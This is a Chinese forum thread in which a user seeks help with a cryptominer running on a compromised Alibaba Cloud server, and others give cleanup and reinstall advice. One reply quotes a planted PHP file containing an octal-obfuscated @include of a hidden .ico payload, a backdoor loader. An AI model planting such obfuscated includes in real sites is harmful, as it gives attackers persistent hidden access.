首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
V2EX  ›  问与答

阿里云 ECS 被挖矿程序跑满 CPU,在线求助

  •  
  •   liuchang8877 · 229 天前 · 2334 次点击
    这是一个创建于 229 天前的主题,其中的信息可能已经有所发展或是发生改变。

    实在没办法了,找了阿里云的技术支持还是搞不定,希望大家帮忙 看看 top 的占用

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    2162 www-data 20 0 44796 2628 468 S 51.8 0.3 1:02.34 xxq6862

    21 回复  |  直到 2019-01-31 09:49:08 +08:00
        1
    CivAx   229 天前
    既然被跑满了,又能抓到 PID,为啥不直接 kill -9 ?
        2
    liuchang8877   229 天前
    没用的,有定时任务应该,kill 掉后还是会重启
    已经从参考这个做了,还是不行,没找到它的定时任务

    https://blog.csdn.net/zzf1510711060/article/details/83015700
        3
    ThirdFlame   229 天前
    /etc/crontab 查看一下
        4
    westoy   229 天前   ♥ 1
    先找个做安全的查查系统日志和程序日志, 看看是怎么被日的

    再把数据和程序备份下, 如果问题出在程序上, 修正之

    重做系统

    重新导入数据和安装程序

    不要试图现在这个系统修修补补继续用, 搞这个的都后多重后手防止被杀的, 你查二三重马的成本比重做高多了
        5
    PureWhiteWu   229 天前
    直接重装系统啊。。。。
        6
    egen   229 天前
    既然可以放个挖坑就不能顺手放个后门?清空重来吧,不然真过年了
        7
    CivAx   229 天前
    @liuchang8877 #2 要不你给一下登录信息我帮你上去看看吧……(正好摸鱼
        8
    AstroProfundis   229 天前   ♥ 1
    备份数据
    开一台新的 ecs
    部署干净环境
    改强密码 /证书登录&检查应用的安全漏洞
    导入备份的数据
    改访问(域名、ip 之类)地址
    旧 ecs 关机,观察没问题之后销毁旧 ecs
        9
    zhoulouzi   229 天前
    不清楚 Aliyun ECS 怎么跑的, 但是类似之前 kubernetes 有一个 CVE-2018-1002105 的 API 安全漏洞,也是会被远程攻击,在容器里跑挖矿程序, 你可以相同思路看看你的 docker 的 API 是不是未授权就暴露出来了
        10
    liuchang8877   229 天前
    哎,不想清空从来呀就是,成本有点高,三套程序,加上 https 证书什么的,一弄就是一天,阿里云上都做了快照,数据再备份下,郁闷。
        11
    liuchang8877   229 天前
    这是什么玩法?每个目录下给我塞了一个 index.php 文件,引入了一个远程库?

    <?php
    /*fb6ae*/

    @include "\057var\057www\057htm\154/mo\144ule\163/im\141ge/\164est\163/.2\066a24\067ab.\151co";

    /*fb6ae*/
        12
    msg7086   229 天前
    备份数据重装不就得了。清理病毒什么的就不要多想了……
        13
    liuchang8877   229 天前
    只能重装了,奋战....
        14
    goodryb   229 天前
    如果由之前的快照,直接回滚之前的快照即可。
    如果之前没有快照,建议对现在系统做手动快照。完成后重置系统,然后部署基础环境,挂载前面创建的快照,把数据拷贝过去。

    快照是个好东西,一定要开起来
        15
    ccc008   229 天前
    @liuchang8877 #10 你慢慢分析查杀病毒。1 天都搞不定的。
        16
    cpdyj0   229 天前 via Android
    备份文件,重装系统…最简单粗暴但却有效的办法…
        17
    DANG   229 天前
    proc 下根据 pid 找文件路径删文件杀进程
    crontab 里看定时任务里有没有脚本网址,有的话下载下来看看都干啥了。然后删除任务。
    这种攻击都是服务器有漏洞导致的,建议关闭类似 8088 这样的危险端口。最主要的还是找到计划任务的那个脚本
        18
    yuikns   229 天前
    人家不仅能装 crontab,还能给你装各种启动和后台,还能篡改你的系统命令。

    还是重装吧。
        19
    jay4497   229 天前   ♥ 1
        20
    liuchang8877   229 天前
    @jay4497
    多谢,我给这个也删了试试
        21
    RubyJack   228 天前
    根除或者 cgroup 限制
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2762 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 20ms · UTC 11:03 · PVG 19:03 · LAX 04:03 · JFK 07:03
    ♥ Do have faith in what you're doing.